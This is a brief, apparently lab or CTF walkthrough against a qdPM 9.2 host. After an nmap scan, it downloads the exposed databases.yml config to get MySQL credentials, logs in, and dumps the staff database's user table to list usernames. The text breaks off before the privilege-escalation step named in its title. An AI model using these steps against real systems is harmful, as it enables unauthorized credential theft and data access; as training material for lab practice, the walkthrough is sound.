sql misconfiguration and privesc with path vulnerbility
sql misconfiguration and privesc with path vulnerability 1 nmap -sV . -sV = Probe open ports to determine service/version info. 2 search ip in browser to show admin page. . qdPM 9.2 = show website version. 3 check version is exploitable or not. . version is exploitable. . check last line in exploit this link to install yml file link = http://<website>/core/config/databases.yml 4 Download yml file to see username name and password for mysql databse. 5 chek yml file. 6 enter mysql dabatse use username and password. # mysql -h -u qdpmadmin -p . -h = host . -u = username. . -p = password 7 show mysql databses. # show databases; . to show all dabatbase in mysql. 8 go staff database and show tables. # use staff # show tables; . this colum to informatin about staff informatin 9 show user table data to information about usernames. # select * from user; . * = selcet all data. . To show all users. . and copy all user and make list for users. EX:- nano user....